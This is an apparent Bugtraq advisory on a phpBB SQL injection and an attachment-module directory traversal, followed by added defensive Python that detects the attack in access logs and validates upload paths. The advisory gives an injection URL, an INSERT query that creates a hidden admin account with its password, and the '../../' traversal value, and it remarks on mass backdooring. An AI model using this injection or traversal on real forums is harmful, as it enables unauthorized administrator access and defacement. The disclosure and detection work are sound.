From: zee@psybnc.it
To: bugtraq@securityfocus.com
Subject: Phpbb id: 10701 update and Attachmodule add-on Directory Traversal
Phpbb: All versions vulnerable except 2.0.11
Attachment module: All version vulnerable
Howdark's update opened my eyes wide with his nice exploit:
Bugtraq id: 10701
-----
viewtopic.php?t=1&highlight=%2527
-----
Looking at the code I saw that it was possible to inject any type of SQL query with multiple char() functions.
The following code can add a username with admin rights by executing this query:
INSERT INTO phpbb_users(user_id,user_active,username,user_password,user_level) VALUES ('99999','1','ze3lock','ba3c83348bddf7b368b478ac06d3340e','1')
And a new user with admin rights will be added to phpbb_users.
*Note: we can only execute a working query if we know the table names. If not, we can't. So this works only with a standard installation (usually 95% of websites ;-)
username: ze3lock
pass: thepass
The exploit can be run without being logged in, and then you can get access with that username. So it's quite simple to make it part of a script that could make backdoors around the web.
To make it work, just use the id of a working thread (in this case the thread is 30; you can see it from the message)
--- Code start ----
http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query.....usw.....usw.....usw....
--- code end ---
------------ Attach Module ----------------
In the attach module, I found a directory traversal in the "UPLOAD_DIR" field.
This is the directory where all attachments are supposed to be uploaded.
The field accepts any kind of character, so you can put '../../' instead of 'files' and all the attachments will be uploaded to the '../../' directory.
That's really dangerous as a defacement threat.
--------------- Suggestion ------------------
Please upgrade to version 2.0.11 and add input validation to the UPLOAD_DIR field in the attach module.
Zeelock
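The two issues in the post above, seen from the defender's side, as an added example (Python written for this page, not code from the advisory or from phpBB). The first function scans access-log lines for viewtopic.php requests whose raw highlight parameter carries the double-encoded quote (%2527) that the BID 10701 exploit relies on, and reports the decoded payload; the second validates an UPLOAD_DIR-style setting against the forum's files root so that '../' values are rejected, which is the input validation the suggestion asks for. The log lines, paths and function names are all constructed for the example and are not from the original post.

```python
"""Defensive checks for the two phpBB issues in the post (added example).

1. detect_highlight_injection(): flags access-log requests to viewtopic.php
   whose raw `highlight` value contains the double-URL-encoded quote (%2527)
   and returns the twice-decoded payload for the analyst.
2. resolve_upload_dir(): maps an UPLOAD_DIR-style setting onto the files root
   and refuses any value that would escape it (e.g. '../../').
All sample data below is constructed for the example.
"""
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in Common Log Format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2004:12:00:01 +0000] "GET /forum/viewtopic.php?t=30&highlight=%2527%252emysql_query HTTP/1.0" 200 5120
203.0.113.6 - - [10/Nov/2004:12:00:02 +0000] "GET /forum/viewtopic.php?t=30&highlight=phpbb HTTP/1.0" 200 5120
203.0.113.7 - - [10/Nov/2004:12:00:03 +0000] "GET /forum/index.php HTTP/1.0" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def detect_highlight_injection(log_text):
    """Return (ip, decoded_highlight) for each viewtopic.php request whose raw
    `highlight` value contains %2527. The query string is inspected without
    percent-decoding first: one decode turns %2527 into %27, and it is the
    second decode inside the application that yields the quote character."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        if not parts.path.endswith("/viewtopic.php"):
            continue
        for pair in parts.query.split("&"):
            key, _, value = pair.partition("=")
            if key == "highlight" and "%2527" in value.upper():
                hits.append((m.group("ip"), unquote(unquote(value))))
    return hits


# Allowed shape for the setting: one or more plain directory names joined by '/'.
UPLOAD_DIR_RE = re.compile(r"[A-Za-z0-9_-]+(/[A-Za-z0-9_-]+)*")


def resolve_upload_dir(files_root, configured):
    """Return the absolute path for an UPLOAD_DIR setting, or raise ValueError.
    Uses posixpath so the check behaves the same on every OS."""
    root = posixpath.normpath(files_root)
    if not posixpath.isabs(root):
        raise ValueError("files_root must be an absolute path")
    if posixpath.isabs(configured):
        raise ValueError("UPLOAD_DIR must be relative to the files root")
    # Whitelist first: '.' is not allowed, so '..' segments never get through.
    if not UPLOAD_DIR_RE.fullmatch(configured):
        raise ValueError("UPLOAD_DIR may only contain letters, digits, '_', '-' and '/'")
    target = posixpath.normpath(posixpath.join(root, configured))
    # Second line of defence: confirm containment after normalisation.
    if not (target == root or target.startswith(root + "/")):
        raise ValueError("UPLOAD_DIR escapes the files root")
    return target


def is_safe_upload_dir(files_root, configured):
    """Boolean wrapper around resolve_upload_dir() for callers that only gate."""
    try:
        resolve_upload_dir(files_root, configured)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for ip, payload in detect_highlight_injection(SAMPLE_LOG):
        print(f"suspicious highlight from {ip}: {payload!r}")
    for setting in ("files", "files/2004", "../../", "/tmp"):
        print(f"UPLOAD_DIR={setting!r}: {'ok' if is_safe_upload_dir('/var/www/forum', setting) else 'rejected'}")
```

Matching on the raw query string is the point of the detector: a log pipeline that percent-decodes URLs before matching would see only `%27` and miss the double-encoding trick the post describes.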